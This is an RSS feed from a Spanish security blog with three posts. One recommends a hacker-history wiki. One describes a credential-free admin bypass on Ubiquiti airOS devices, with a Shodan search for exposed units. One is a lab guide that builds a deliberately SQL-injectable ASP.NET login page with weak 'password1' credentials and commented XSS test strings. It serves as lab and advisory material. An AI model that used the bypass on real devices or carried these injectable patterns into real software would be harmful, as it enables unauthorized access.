<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Caminando entre bits... &#187; hacking</title>
	<atom:link href="http://seifreed.com/tag/hacking/feed/" rel="self" type="application/rss+xml" />
	<link>http://seifreed.com</link>
	<description></description>
	<lastBuildDate>Wed, 30 May 2012 11:00:03 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='seifreed.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Caminando entre bits... &#187; hacking</title>
		<link>http://seifreed.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://seifreed.com/osd.xml" title="Caminando entre bits..." />
	<atom:link rel='hub' href='http://seifreed.com/?pushpress=hub'/>
		<item>
		<title>Hack Story</title>
		<link>http://seifreed.com/2012/01/02/hack-story/</link>
		<comments>http://seifreed.com/2012/01/02/hack-story/#comments</comments>
		<pubDate>Mon, 02 Jan 2012 06:00:15 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Hack Story]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[hacking]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4017</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! No podía dejar de poner en este blog la web de Hack Story un proyecto que administra la ya conocida en la red Merce Molist. Así que empezamos el &#8220;primer día&#8221; laborable en la que os recomiendo esta web. Hack Story nace en verano de 2008 en Barcelona. Es un [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=4017&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>No podía dejar de poner en este blog la web de Hack Story un proyecto que administra la ya conocida en la red <a href="http://twitter.com/mercemolist">Merce Molist</a>.</p>
<p>Así que empezamos el &#8220;primer día&#8221; laborable en la que os recomiendo esta web.</p>
<p>Hack Story nace en verano de 2008 en Barcelona. Es un proyecto vivo de recuperación de la historia de la comunidad hacker.</p>
<p>Os copio y pego la definición del about:</p>
<blockquote><p><strong>Hack Story</strong> nace en verano de 2008 en Barcelona. Es un proyecto vivo de recuperación de la historia de la comunidad hacker.</p>
<p>Actualmente abarca la comunidad hacker hispana, aunque tiene vocación planetaria, de ahí el uso del inglés en los principales parámetros, categorías y textos de presentación. El contenido, en cambio, se escribe en el idioma de sus protagonistas. Otras lenguas, espacios y tiempos son bienvenidos.</p>
<p><strong>Hack Story</strong> se manifiesta en la red a través de una plataforma wiki, para que cualquiera pueda corregir errores o añadir datos (debido a recientes bombardeos de &#8220;spam&#8221;, hemos moderado la introducción de nueva información en el wiki, así como la creación de nuev@os usuari@s).</p>
<p><a title="User:Merce" href="Merce">Mercè Molist</a> es la administradora del wiki en lo que a contenidos se refiere. <a title="User:Xavi" href="Xavi">Xavi Caballé</a> aportó desinteresadamente el alojamiento en sus inicios y Alfonso, la personalización del wiki y ayuda técnica. Gracias a <a href="http://www.harkoblog.com/" rel="nofollow">Harko</a> por el apoyo gráfico y a <a href="http://blackhold.nusepas.com/" rel="nofollow">Blackhold</a> por actualizar el software, ambos de forma voluntaria. Actualmente la Hackstory tiene alojamiento y servicio técnico gratuitos en <a href="http://www.nonfqdn.net" rel="nofollow">NONFQDN</a>. ¡Gracias!</p>
<p><strong>Hack Story</strong> está sujeta a su <a title="Hack Story:Policy" href="Policy">propia política</a>, a la <a title="Ética hacker es" href="/index.php/%C3%89tica_hacker_es">ética hacker</a> y a las leyes vigentes, por este orden</p></blockquote>
<p>Os adjunto un pantallazo del Hack Story</p>
<p><img class="aligncenter" src="http://img689.imageshack.us/img689/5340/hackstory.png" alt="" width="800" height="396" /></p>
<p>Os animo a pasaros por esta Wiki a aprender mas sobre los Hackers <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>&nbsp;</p>
<p>Saludos</p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/hack-story/'>Hack Story</a>, <a href='http://seifreed.com/tag/hackers/'>hackers</a>, <a href='http://seifreed.com/tag/hacking/'>hacking</a>, <a href='http://seifreed.com/tag/seguridad/'>Seguridad</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4017/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4017/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4017/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4017/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4017/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4017/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4017/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4017/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4017/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4017/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4017/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4017/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4017/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4017/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=4017&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/01/02/hack-story/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img689.imageshack.us/img689/5340/hackstory.png" medium="image" />
	</item>
		<item>
		<title>0day en sistema operativo airos</title>
		<link>http://seifreed.com/2011/12/26/0day-en-sistema-operativo-airos/</link>
		<comments>http://seifreed.com/2011/12/26/0day-en-sistema-operativo-airos/#comments</comments>
		<pubDate>Mon, 26 Dec 2011 06:00:30 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[AIROS]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[ubiquity]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=3996</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Es MUY conocida la marca Ubiquity como producto Wireless. Su bajo coste, además de lo fácil, rápido y la gran cantidad de funcionalidades que tienen convierte este tipo de dispositivos en una gran ayuda en el montaje de infraestructuras Wireless. El sistema operativo que administra estos dispositivos es airos, y [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3996&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Es MUY conocida la marca Ubiquity como producto Wireless. Su bajo coste, además de lo fácil, rápido y la gran cantidad de funcionalidades que tienen convierte este tipo de dispositivos en una gran ayuda en el montaje de infraestructuras Wireless.</p>
<p>El sistema operativo que administra estos dispositivos es airos, y no está exento a fallos de seguridad.</p>
<p>El fallo reside en que poder visitar la página de administración llamando directamente al admin.cgi del dispositivo.</p>
<p>Un PoC puede este mismo, nos encontramos con la pantalla de login:</p>
<p><img class="aligncenter" src="http://img249.imageshack.us/img249/732/airos1.png" alt="" width="800" height="342" /></p>
<p>En la URL solo tendríamos que invocar el archivo admin.cgi/sd.css para acceder a la parte de administración:</p>
<p><img class="aligncenter" src="http://img195.imageshack.us/img195/9877/adminur.png" alt="" width="800" height="371" /></p>
<p>Este sería el resultado de poder pedir la petición al archivo de admin.CGI</p>
<p>Este fallo es bastante grande ya que permite administrar el dispositivo sin tener credenciales sobre el mismo.</p>
<p>Además gracias a Shodan es posible encontrar dispositivos con airos</p>
<blockquote><p><a href="http://www.shodanhq.com/search?q=airos">http://www.shodanhq.com/search?q=airos</a></p></blockquote>
<p>Es importante actualizar los dispositivos a última versión para corregir este fallo</p>
<p>Saludos cordiales</p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/0day/'>0day</a>, <a href='http://seifreed.com/tag/airos/'>AIROS</a>, <a href='http://seifreed.com/tag/hacking/'>hacking</a>, <a href='http://seifreed.com/tag/seguridad/'>Seguridad</a>, <a href='http://seifreed.com/tag/ubiquity/'>ubiquity</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/3996/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/3996/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/3996/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/3996/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/3996/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/3996/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/3996/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/3996/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/3996/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/3996/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/3996/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/3996/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/3996/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/3996/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3996&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2011/12/26/0day-en-sistema-operativo-airos/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img249.imageshack.us/img249/732/airos1.png" medium="image" />

		<media:content url="http://img195.imageshack.us/img195/9877/adminur.png" medium="image" />
	</item>
		<item>
		<title>Preparando Windows XP-SP2 para entorno de pruebas de auditoría</title>
		<link>http://seifreed.com/2011/12/24/preparando-windows-xp-sp2-para-entorno-de-pruebas-de-auditoria/</link>
		<comments>http://seifreed.com/2011/12/24/preparando-windows-xp-sp2-para-entorno-de-pruebas-de-auditoria/#comments</comments>
		<pubDate>Sat, 24 Dec 2011 06:00:38 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Metasploitable]]></category>
		<category><![CDATA[Windows XP]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=3990</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Si queremos hacer prácticas con Metasploit u otras herramientas en un entorno controlado es bueno poder tener un sistema operativo configurado de manera que pueda ser susceptible a ataques para poder practicar. Los de Offensive Security tienen una guía de como configurar un Windows XP Service Pack 2 para habilitar [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3990&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Si queremos hacer prácticas con Metasploit u otras herramientas en un entorno controlado es bueno poder tener un sistema operativo configurado de manera que pueda ser susceptible a ataques para poder practicar. Los de <a href="http://www.offensive-security.com/metasploit-unleashed/Windows_XP_Machine_Setup">Offensive Security</a> tienen una guía de como configurar un Windows XP Service Pack 2 para habilitar servicios y aplicaciones vulnerables. Me he basado en la web de Offensive Security, recordad que para habilitar estos servicios deberemos de contar una licencia de Windows XP SP2.</p>
<p>No entraré en detalles de como realizar una instalación de Windows, sólo hay que instalarla con las opciones por defecto.</p>
<p>Una vez instalado vamos a configurar ciertas cosas.</p>
<ul>
<li><strong>Primero</strong> lo que haremos será deshabilitar protecciones nativas del sistema operativo además de desactivar las notificaciones.</li>
</ul>
<p>Nos vamos al centro de Seguridad en Windows XP.</p>
<p><img class="aligncenter" src="http://img196.imageshack.us/img196/4562/securitycenter.png" alt="" width="747" height="523" /></p>
<p>Desactivamos Firewall, antivirus, y vamos a las opciones de notificación que hay marcadas en la imagen</p>
<p><img class="aligncenter" src="http://img809.imageshack.us/img809/798/alertasa.png" alt="" width="714" height="398" /></p>
<p>Desmarcamos las checkboxes.</p>
<p>Por defecto viene activado la compartición de archivos simple, pero  no está de mas revisarlo. En opciones de carpeta comprobamos que este marcado:</p>
<p><img src="http://img11.imageshack.us/img11/2518/usocompartido.png" alt="" width="383" height="472" /></p>
<p>Ahora ya hemos configurado una parte de sistema operativo</p>
<ul>
<li>Lo <strong>segundo </strong>es configurar servicios adicionales, por eso nos iremos a añadir o remover componentes de Windows en Agregar o quitar programas</li>
</ul>
<p><img class="aligncenter" src="http://img802.imageshack.us/img802/9254/serviciosadicionales.png" alt="" width="501" height="392" /></p>
<p>Instalamos ISS y FTP. Además también instalamos SNMP</p>
<p><img class="aligncenter" src="http://img17.imageshack.us/img17/160/monitoring.png" alt="" width="503" height="392" /></p>
<ul>
<li><strong>Tercero </strong>instalamos SQL Server Express para configurar una aplicación vulnerable</li>
</ul>
<p>Para instalar SQL Server Express nos hará falta como requisitos Net Framework y Windows Installer 3.1</p>
<p><a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=0856EACB-4362-4B0D-8EDD-AAB15C5E04F5&amp;displaylang=en">Net Framework 2.0</a></p>
<p><a href="http://www.microsoft.com/downloads/details.aspx?familyid=889482FC-5F56-4A38-B838-DE776FD4138C&amp;displaylang=en">Windows Installer 3.1</a></p>
<p><a href="http://www.microsoft.com/downloads/details.aspx?familyid=220549B5-0B07-4448-8848-DCC397514B41&amp;displaylang=en">SQL Server Express</a></p>
<p>En la instalación de SQLL Server Express cuando lleguemos al apartado de autenticación</p>
<p><img class="aligncenter" src="http://img401.imageshack.us/img401/4627/sqlexpress01.png" alt="" width="484" height="448" /></p>
<p>Ponemos como password password1</p>
<p>Una vez terminada la instalación tenemos que configurarlo.</p>
<p>Accedemos al SQL Server Configuration Manager</p>
<p><img class="aligncenter" src="http://img401.imageshack.us/img401/4627/sqlexpress01.png" alt="" width="484" height="448" /></p>
<p>En el apartado de TCP/IP en propiedades configuramos</p>
<p><img class="aligncenter" src="http://img20.imageshack.us/img20/2051/sqlexpress03.png" alt="" width="676" height="465" /></p>
<p>Dejamos los valores como pone en la imagen</p>
<p><img class="aligncenter" src="http://img856.imageshack.us/img856/1734/sqlexpress04.png" alt="" width="677" height="462" /></p>
<p>En el apartado de SQL Browser ponemos que se inicie de manera automática</p>
<p><img class="aligncenter" src="http://img811.imageshack.us/img811/3385/sqlexpress05.png" alt="" width="675" height="462" /></p>
<p>Ahora para finalizar con Netstat miramos las conexiones</p>
<p>&nbsp;</p>
<ul>
<li></li>
</ul>
<p>Primero bajamos <a href="http://www.microsoft.com/downloadS/details.aspx?familyid=C243A5AE-4BD1-4E3D-94B8-5A0F62BF7796&amp;displaylang=en|SQL">Server Management Studio Express</a></p>
<p>Una vez abierto, nos autenticamos con sa y password1</p>
<p><img class="aligncenter" src="http://img23.imageshack.us/img23/3005/webapp01.png" alt="" width="333" height="254" /></p>
<p>Creamos una nueva base de datos</p>
<p><img class="aligncenter" src="http://img208.imageshack.us/img208/6515/webapp02.png" alt="" width="385" height="216" /></p>
<p>En la nueva base de datos creamos una tabla</p>
<p><img class="aligncenter" src="http://img412.imageshack.us/img412/5426/webapp03.png" alt="" width="686" height="163" /></p>
<p>Rellenamos la tabla con los siguientes campos</p>
<p><img class="aligncenter" src="http://img819.imageshack.us/img819/9644/webapp04.png" alt="" width="308" height="135" /></p>
<p>Rellenamos la tabla con datos reales</p>
<p><img class="aligncenter" src="http://img713.imageshack.us/img713/3258/webapp05.png" alt="" width="655" height="128" /></p>
<p>Ahora en el apartado de Seguridad le damos a New Login</p>
<p><img class="aligncenter" src="http://img502.imageshack.us/img502/3896/webapp06.png" alt="" width="283" height="169" /></p>
<p>En Login le damos a search y buscamos el usuario aspnet</p>
<p><img class="aligncenter" src="http://img823.imageshack.us/img823/1640/webapp07.png" alt="" width="578" height="317" /></p>
<p>Por último configuramos que el usuario aspnet sea owner de la base de datos que hemos creado</p>
<p><img class="aligncenter" src="http://img522.imageshack.us/img522/4193/webapp08.png" alt="" width="703" height="630" /></p>
<p>Para crear la aplicación vulnerable web creamos en wwwroot el archivo Default.aspx</p>
<blockquote><p>&lt;%@ Page Language=&#8221;C#&#8221; AutoEventWireup=&#8221;true&#8221; ValidateRequest=&#8221;false&#8221; CodeFile=&#8221;Default.aspx.cs&#8221; Inherits=&#8221;_Default&#8221; %&gt; &lt;%&#8211;the ValidateRequest=&#8221;true&#8221; in the page directive will check for &lt;script&gt; and other potentially dangerous inputs&#8211;%&gt; &lt;!DOCTYPE html PUBLIC &#8220;-//W3C//DTD XHTML 1.0 Transitional//EN&#8221; &#8220;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&#8221;&gt;<br />
&lt;html xmlns=&#8221;http://www.w3.org/1999/xhtml&#8221; &gt; &lt;head runat=&#8221;server&#8221;&gt;<br />
&lt;/head&gt; &lt;body bgcolor=&#8221;white&#8221;&gt; &lt;form id=&#8221;form1&#8243; runat=&#8221;server&#8221;&gt; &lt;div&gt;<br />
&lt;font color=&#8221;black&#8221;&gt;&lt;h1&gt;Login Page&lt;/h1&gt;&lt;/font&gt; &lt;asp:Label ID=&#8221;lblErrorMessage&#8221; Font-Size=&#8221;Larger&#8221; ForeColor=&#8221;red&#8221; Visible=&#8221;false&#8221; runat=&#8221;server&#8221; /&gt;<br />
&lt;font color=&#8221;black&#8221;&gt; &lt;asp:Panel ID=&#8221;pnlLogin&#8221; Visible=&#8221;true&#8221; runat=&#8221;server&#8221;&gt; &lt;asp:Table ID=&#8221;tblLogin&#8221; runat=&#8221;server&#8221;&gt; &lt;asp:TableRow&gt; &lt;asp:TableCell&gt; &lt;asp:Literal Text=&#8221;Login:&#8221; runat=&#8221;server&#8221; /&gt; &lt;/asp:TableCell&gt; &lt;asp:TableCell&gt; &lt;asp:TextBox ID=&#8221;txtLogin&#8221; width=&#8221;200&#8243; BackColor=&#8221;white&#8221; ForeColor=&#8221;black&#8221; runat=&#8221;server&#8221; /&gt; &lt;/asp:TableCell&gt; &lt;/asp:TableRow&gt; &lt;asp:TableRow&gt; &lt;asp:TableCell&gt; &lt;asp:Literal ID=&#8221;ltrlPassword&#8221; Text=&#8221;Password&#8221; runat=&#8221;server&#8221; /&gt; &lt;/asp:TableCell&gt; &lt;asp:TableCell&gt; &lt;asp:TextBox ID=&#8221;txtPassword&#8221; width=&#8221;200&#8243; TextMode=&#8221;password&#8221; BackColor=&#8221;white&#8221; ForeColor=&#8221;black&#8221; runat=&#8221;server&#8221; /&gt; &lt;/asp:TableCell&gt; &lt;/asp:TableRow&gt; &lt;asp:TableRow&gt; &lt;asp:TableCell ColumnSpan=&#8221;2&#8243; HorizontalAlign=&#8221;center&#8221;&gt; &lt;asp:Button ID=&#8221;btnSubmit&#8221; BorderColor=&#8221;white&#8221; BackColor=&#8221;white&#8221; ForeColor=&#8221;black&#8221; Text=&#8221;Login&#8221; OnClick=&#8221;btnSubmit_Clicked&#8221; runat=&#8221;server&#8221; /&gt; &lt;br /&gt;&lt;/asp:TableCell&gt; &lt;/asp:TableRow&gt; &lt;/asp:Table&gt; &lt;h5&gt;Please dont hack this site <img src='http://s0.wp.com/wp-includes/images/smilies/icon_sad.gif' alt=':-(' class='wp-smiley' />  &lt;/asp:Panel&gt; &lt;asp:Panel ID=&#8221;pnlChatterBox&#8221; Visible=&#8221;false&#8221; runat=&#8221;server&#8221;&gt; You haz logged in! <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />  &lt;/asp:Panel&gt; &lt;/font&gt;<br />
&lt;/div&gt; &lt;/form&gt; &lt;/body&gt; &lt;/html&gt;</p></blockquote>
<p>También creamos el archivo Default.aspx.cs</p>
<blockquote>
<pre>using System;
using System.Data;
using System.Data.SqlClient;
using System.Configuration;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Web.UI.HtmlControls;

public partial class _Default : System.Web.UI.Page
{
protected SqlConnection objConn = new SqlConnection(ConfigurationManager.ConnectionStrings["test"].ToString());
protected string sql = "";
protected void Page_Load(object sender, EventArgs e)
{
if((Request.QueryString["login"] != null) &amp;&amp;
(Request.QueryString["password"] != null))
{
Response.Write(Request.QueryString["login"].ToString() + "&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;" + Request.QueryString["password"].ToString());

sql = "SELECT first_name + ' ' + last_name + ' ' + middle_name FROM users WHERE username = '" + Request.QueryString["login"] + "' " +
"AND password = '" + Request.QueryString["password"] + "'";
Login();
}
}

public void btnSubmit_Clicked(object o, EventArgs e)
{
lblErrorMessage.Text = "";
lblErrorMessage.Visible = false;

if (txtLogin.Text == "")
{
lblErrorMessage.Text = "Missing login name!&lt;br /&gt;";
lblErrorMessage.Visible = true;
}
else
{
if (txtPassword.Text == "")
{
lblErrorMessage.Text = "Missing password!&lt;br /&gt;";
lblErrorMessage.Visible = true;
}
else
{
sql = "SELECT first_name + ' ' + last_name + ' ' + middle_name FROM users WHERE username = '" + txtLogin.Text + "' " +
"AND password = '" + txtPassword.Text + "'";
Login();
}
}
}

private void Login()
{
//correct sql string using sql parameters.
//string sql = "SELECT first_name + ' ' + last_name FROM users WHERE username = @txtLogin " +
// "AND password = @txtPassword";

SqlCommand cmd = new SqlCommand(sql, objConn);

//each parameter needs added for each user inputted value...
//to take the input literally and not break out with malicious input....
//cmd.Parameters.AddWithValue("@txtLogin", txtLogin.Text);
//cmd.Parameters.AddWithValue("@txtPassword", txtPassword.Text);

objConn.Open();

if (cmd.ExecuteScalar() != DBNull.Value)
{
if (Convert.ToString(cmd.ExecuteScalar()) != "")
{
lblErrorMessage.Text = "Sucessfully logged in!";
lblErrorMessage.Visible = true;
pnlLogin.Visible = false;
pnlChatterBox.Visible = true;
}
else
{
lblErrorMessage.Text = "Invalid Login!";
lblErrorMessage.Visible = true;
}
}
else
{
lblErrorMessage.Text = "Invalid Username/";
lblErrorMessage.Visible = true;
}

objConn.Close();
}

//&lt;style type="text/css"&gt;TABLE {display: none !important;}&lt;/style&gt; //remove tables totally.
//&lt;style type="text/css"&gt;body{background-color: #ffffff;}&lt;/style&gt; //change background color
//&lt;style type="text/css"&gt;div {display: none !important;}&lt;/style&gt; //remove all divs, blank out page
//&lt;script&gt;alert("hello");&lt;/script&gt;
//&lt;meta http-equiv="refresh" content="0; url=http://www.google.com" /&gt;
}</pre>
</blockquote>
<p>Y por último creamos el archivo web.config</p>
<blockquote><p>&lt;?xml version=&#8221;1.0&#8243;?&gt; &lt;configuration&gt; &lt;connectionStrings&gt; &lt;add name=&#8221;test&#8221; connectionString=&#8221;server=localhost;database=WebApp;uid=sa;password=password1;&#8221; providerName=&#8221;System.Data.SqlClient&#8221;/&gt; &lt;/connectionStrings&gt; &lt;system.web&gt;<br />
&lt;!&#8211; DYNAMIC DEBUG COMPILATION Set compilation debug=&#8221;true&#8221; to enable ASPX debugging. Otherwise, setting this value to false will improve runtime performance of this application. Set compilation debug=&#8221;true&#8221; to insert debugging symbols(.pdb information) into the compiled page. Because this creates a larger file that executes more slowly, you should set this value to true only when debugging and to false at all other times. For more information, refer to the documentation about debugging ASP.NET files. &#8211;&gt; &lt;compilation defaultLanguage=&#8221;c#&#8221; debug=&#8221;true&#8221;&gt; &lt;assemblies&gt; &lt;add assembly=&#8221;System.Design, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A&#8221;/&gt; &lt;add assembly=&#8221;System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089&#8243;/&gt;&lt;/assemblies&gt;&lt;/compilation&gt; &lt;!&#8211; CUSTOM ERROR MESSAGES Set customErrors mode=&#8221;On&#8221; or &#8220;RemoteOnly&#8221; to enable custom error messages, &#8220;Off&#8221; to disable. Add &lt;error&gt; tags for each of the errors you want to handle.<br />
&#8220;On&#8221; Always display custom (friendly) messages. &#8220;Off&#8221; Always display detailed ASP.NET error information. &#8220;RemoteOnly&#8221; Display custom (friendly) messages only to users not running on the local Web server. This setting is recommended for security purposes, so that you do not display application detail information to remote clients. &#8211;&gt; &lt;customErrors mode=&#8221;Off&#8221;/&gt; &lt;!&#8211; AUTHENTICATION This section sets the authentication policies of the application. Possible modes are &#8220;Windows&#8221;, &#8220;Forms&#8221;, &#8220;Passport&#8221; and &#8220;None&#8221;<br />
&#8220;None&#8221; No authentication is performed. &#8220;Windows&#8221; IIS performs authentication (Basic, Digest, or Integrated Windows) according to its settings for the application. Anonymous access must be disabled in IIS. &#8220;Forms&#8221; You provide a custom form (Web page) for users to enter their credentials, and then you authenticate them in your application. A user credential token is stored in a cookie. &#8220;Passport&#8221; Authentication is performed via a centralized authentication service provided by Microsoft that offers a single logon and core profile services for member sites. &#8211;&gt; &lt;authentication mode=&#8221;Windows&#8221;/&gt; &lt;!&#8211; AUTHORIZATION This section sets the authorization policies of the application. You can allow or deny access to application resources by user or role. Wildcards: &#8220;*&#8221; mean everyone, &#8220;?&#8221; means anonymous (unauthenticated) users. &#8211;&gt; &lt;authorization&gt; &lt;allow users=&#8221;*&#8221;/&gt; &lt;!&#8211; Allow all users &#8211;&gt; &lt;!&#8211; &lt;allow users=&#8221;[comma separated list of users]&#8221; roles=&#8221;[comma separated list of roles]&#8220;/&gt; &lt;deny users=&#8221;[comma separated list of users]&#8221; roles=&#8221;[comma separated list of roles]&#8220;/&gt; &#8211;&gt; &lt;/authorization&gt; &lt;!&#8211; APPLICATION-LEVEL TRACE LOGGING Application-level tracing enables trace log output for every page within an application. Set trace enabled=&#8221;true&#8221; to enable application trace logging. If pageOutput=&#8221;true&#8221;, the trace information will be displayed at the bottom of each page. Otherwise, you can view the application trace log by browsing the &#8220;trace.axd&#8221; page from your web application root. &#8211;&gt; &lt;trace enabled=&#8221;false&#8221; requestLimit=&#8221;10&#8243; pageOutput=&#8221;false&#8221; traceMode=&#8221;SortByTime&#8221; localOnly=&#8221;true&#8221;/&gt; &lt;!&#8211; SESSION STATE SETTINGS By default ASP.NET uses cookies to identify which requests belong to a particular session. If cookies are not available, a session can be tracked by adding a session identifier to the URL. To disable cookies, set sessionState cookieless=&#8221;true&#8221;. &#8211;&gt; &lt;sessionState mode=&#8221;InProc&#8221; stateConnectionString=&#8221;tcpip=127.0.0.1:42424&#8243; sqlConnectionString=&#8221;data source=127.0.0.1;Trusted_Connection=yes&#8221;<br />
cookieless=&#8221;false&#8221; timeout=&#8221;20&#8243;/&gt; &lt;!&#8211; GLOBALIZATION This section sets the globalization settings of the application. &#8211;&gt; &lt;globalization requestEncoding=&#8221;utf-8&#8243; responseEncoding=&#8221;utf-8&#8243;/&gt; &lt;/system.web&gt; &lt;/configuration&gt;</p></blockquote>
<p>Ya tenemos la aplicación web vulnerable, mas adelante haremos prueba de intrusión.</p>
<p>&nbsp;</p>
<p>Saludos cordiales</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
